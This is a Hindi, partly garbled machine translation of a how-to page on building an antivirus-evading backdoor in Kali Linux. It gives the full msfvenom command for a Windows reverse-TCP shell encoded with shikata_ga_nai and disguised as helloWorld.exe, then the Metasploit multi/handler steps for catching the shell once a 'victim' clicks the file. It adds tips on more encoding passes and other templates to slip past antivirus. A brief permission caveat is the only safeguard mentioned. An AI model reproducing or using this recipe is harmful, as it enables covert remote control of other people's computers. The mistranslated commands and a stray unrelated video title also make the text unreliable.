काली लिनक्स में MSFvenom का उपयोग करके लगभग पता लगाने योग्य पिछले दरवाजे का निर्माण कैसे करें

विषयसूची:

काली लिनक्स में MSFvenom का उपयोग करके लगभग पता लगाने योग्य पिछले दरवाजे का निर्माण कैसे करें
काली लिनक्स में MSFvenom का उपयोग करके लगभग पता लगाने योग्य पिछले दरवाजे का निर्माण कैसे करें

वीडियो: काली लिनक्स में MSFvenom का उपयोग करके लगभग पता लगाने योग्य पिछले दरवाजे का निर्माण कैसे करें

वीडियो: काली लिनक्स में MSFvenom का उपयोग करके लगभग पता लगाने योग्य पिछले दरवाजे का निर्माण कैसे करें
वीडियो: कबीले महल सैनिकों के बिना शीर्ष 5 वें 8 हमले की रणनीतियाँ (कुलों का संघर्ष) 2024, मई
Anonim

एक पिछले दरवाजे का उपयोग सुरक्षा तंत्र को बायपास करने के लिए किया जाता है, अक्सर गुप्त रूप से और अधिकतर अनजाने में। MSFvenom, msfpayload और msfencode के संयोजन का उपयोग करके, एक बैकडोर बनाना संभव है जो रिवर्स शेल टीसीपी का उपयोग करके हमलावर से वापस जुड़ता है। पिछले दरवाजे को विकसित करने के लिए, आपको किसी भी एंटीवायरस सॉफ़्टवेयर से बचने के लिए अपने मैलवेयर के हस्ताक्षर बदलने होंगे। इस प्रोजेक्ट को कंप्यूटर की एक जोड़ी पर पूरा करें, जिसे एक्सेस करने की आपके पास अनुमति है, और इस प्रक्रिया में, आप कंप्यूटर सुरक्षा और इस तरह के पिछले दरवाजे के काम करने के तरीके के बारे में और जानेंगे।

कदम

काली लिनक्स चरण 1 में MSFvenom का उपयोग करके लगभग पता लगाने योग्य पिछले दरवाजे का निर्माण करें
काली लिनक्स चरण 1 में MSFvenom का उपयोग करके लगभग पता लगाने योग्य पिछले दरवाजे का निर्माण करें

चरण 1. काली को प्रारंभ करें और टर्मिनल कंसोल को चालू करें।

काली लिनक्स चरण 2 में MSFvenom का उपयोग करके लगभग पता लगाने योग्य पिछले दरवाजे का निर्माण करें
काली लिनक्स चरण 2 में MSFvenom का उपयोग करके लगभग पता लगाने योग्य पिछले दरवाजे का निर्माण करें

चरण 2. इंटरफ़ेस प्रदर्शित करने के लिए ifconfig टाइप करें और अपना आईपी पता जांचें।

काली लिनक्स चरण 3 में MSFvenom का उपयोग करके लगभग पता लगाने योग्य पिछले दरवाजे का निर्माण करें
काली लिनक्स चरण 3 में MSFvenom का उपयोग करके लगभग पता लगाने योग्य पिछले दरवाजे का निर्माण करें

चरण 3. एन्कोडर्स की सूची दिखाने के लिए msfvenom -l एन्कोडर्स टाइप करें।

आप एन्कोडर के रूप में x86/shikata_ga_nai का उपयोग करेंगे।

काली लिनक्स चरण 4 में MSFvenom का उपयोग करके लगभग पता लगाने योग्य पिछले दरवाजे का निर्माण करें
काली लिनक्स चरण 4 में MSFvenom का उपयोग करके लगभग पता लगाने योग्य पिछले दरवाजे का निर्माण करें

चरण 4. टाइप करें "msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST = 192.168.48.129 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -f exe > helloWorld.exe

  • -a x86 --platform windows उपयोग करने के लिए आर्किटेक्चर को निर्दिष्ट करता है।
  • -p windows/shell/reverse_tcp पेलोड को एम्बेड करने के लिए निर्दिष्ट करता है।
  • LHOST श्रोता का IP पता निर्दिष्ट करता है।
  • LPORT श्रोता पोर्ट को निर्दिष्ट करता है।
  • -बी "\x00" खराब चरित्र (शून्य बाइट्स) से बचने के लिए नामित करता है।
  • -e x86/shikata_ga_nai एन्कोडर नाम निर्दिष्ट करता है।
  • -f exe > helloWorld.exe प्रारूप आउटपुट को निर्दिष्ट करता है।
काली लिनक्स चरण 5 में MSFvenom का उपयोग करके लगभग पता लगाने योग्य पिछले दरवाजे का निर्माण करें
काली लिनक्स चरण 5 में MSFvenom का उपयोग करके लगभग पता लगाने योग्य पिछले दरवाजे का निर्माण करें

चरण 5. टाइप करें msfconsole Metasploit को सक्रिय करने के लिए।

अब आपने अपना पिछला दरवाजा बना लिया है। जब पीड़ित helloWorld.exe पर क्लिक करता है, तो एम्बेडेड शेल पेलोड सक्रिय हो जाएगा और आपके सिस्टम से कनेक्शन वापस कर देगा। कनेक्शन प्राप्त करने के लिए, आपको मेटास्प्लोइट में मल्टी-हैंडलर खोलना होगा और पेलोड सेट करना होगा।

काली लिनक्स चरण 6 में MSFvenom का उपयोग करके लगभग पता लगाने योग्य पिछले दरवाजे का निर्माण करें
काली लिनक्स चरण 6 में MSFvenom का उपयोग करके लगभग पता लगाने योग्य पिछले दरवाजे का निर्माण करें

चरण 6. टाइप करें शोषण/बहु/हैंडलर का उपयोग करें।

काली लिनक्स चरण 7 में MSFvenom का उपयोग करके लगभग पता लगाने योग्य पिछले दरवाजे का निर्माण करें
काली लिनक्स चरण 7 में MSFvenom का उपयोग करके लगभग पता लगाने योग्य पिछले दरवाजे का निर्माण करें

चरण 7. टाइप करें पेलोड विंडोज़/शेल/रिवर्स_टीसीपी सेट करें।

काली लिनक्स चरण 8 में MSFvenom का उपयोग करके लगभग पता लगाने योग्य पिछले दरवाजे का निर्माण करें
काली लिनक्स चरण 8 में MSFvenom का उपयोग करके लगभग पता लगाने योग्य पिछले दरवाजे का निर्माण करें

चरण 8. मॉड्यूल की जांच के लिए शो विकल्प टाइप करें।

काली लिनक्स चरण 9 में MSFvenom का उपयोग करके लगभग पता लगाने योग्य पिछले दरवाजे का निर्माण करें
काली लिनक्स चरण 9 में MSFvenom का उपयोग करके लगभग पता लगाने योग्य पिछले दरवाजे का निर्माण करें

चरण 9. टाइप करें सेट LHOST 192.168.48.129।

"LHOST" श्रोता का IP पता निर्दिष्ट करता है।

काली लिनक्स चरण 10 में MSFvenom का उपयोग करके लगभग पता लगाने योग्य पिछले दरवाजे का निर्माण करें
काली लिनक्स चरण 10 में MSFvenom का उपयोग करके लगभग पता लगाने योग्य पिछले दरवाजे का निर्माण करें

चरण 10. टाइप करें सेट एलपोर्ट ४४४४।

"LPORT" श्रोता पोर्ट को निर्दिष्ट करता है।

काली लिनक्स चरण 11 में MSFvenom का उपयोग करके लगभग पता लगाने योग्य पिछले दरवाजे का निर्माण करें
काली लिनक्स चरण 11 में MSFvenom का उपयोग करके लगभग पता लगाने योग्य पिछले दरवाजे का निर्माण करें

चरण 11. टाइप करें रन और पीड़ित की मशीन से कनेक्शन की प्रतीक्षा करें।

काली लिनक्स चरण 12 में MSFvenom का उपयोग करके लगभग पता लगाने योग्य पिछले दरवाजे का निर्माण करें
काली लिनक्स चरण 12 में MSFvenom का उपयोग करके लगभग पता लगाने योग्य पिछले दरवाजे का निर्माण करें

चरण 12. पीड़ित के लिए helloWorld.exe पर क्लिक करने की प्रतीक्षा करें।

फिर आप पीड़ित की मशीन से सफलतापूर्वक जुड़ जाएंगे।

टिप्स

  • MSFvenom में -i का उपयोग करना एन्कोडिंग के पुनरावृत्तियों का प्रतिनिधित्व करेगा। कभी-कभी अधिक पुनरावृत्तियां AV सॉफ़्टवेयर से बचने में मदद कर सकती हैं।
  • आपने सीखा है कि MSFvenom का उपयोग करके पिछले दरवाजे को कैसे उत्पन्न किया जाता है और एन्कोड किया जाता है, लेकिन यह विधि आजकल कुछ AV सॉफ़्टवेयर के विरुद्ध पूरी तरह से काम नहीं करेगी। इसके पीछे का कारण MSFvenom में एक्ज़ीक्यूशन टेम्प्लेट हैं। एवी विक्रेताओं ने इन टेम्पलेट्स के स्थिर हस्ताक्षर जोड़े हैं और बस उनकी तलाश करें। इस समस्या का समाधान एक अलग निष्पादन टेम्पलेट या विभिन्न उपकरणों का उपयोग करना है।

सिफारिश की: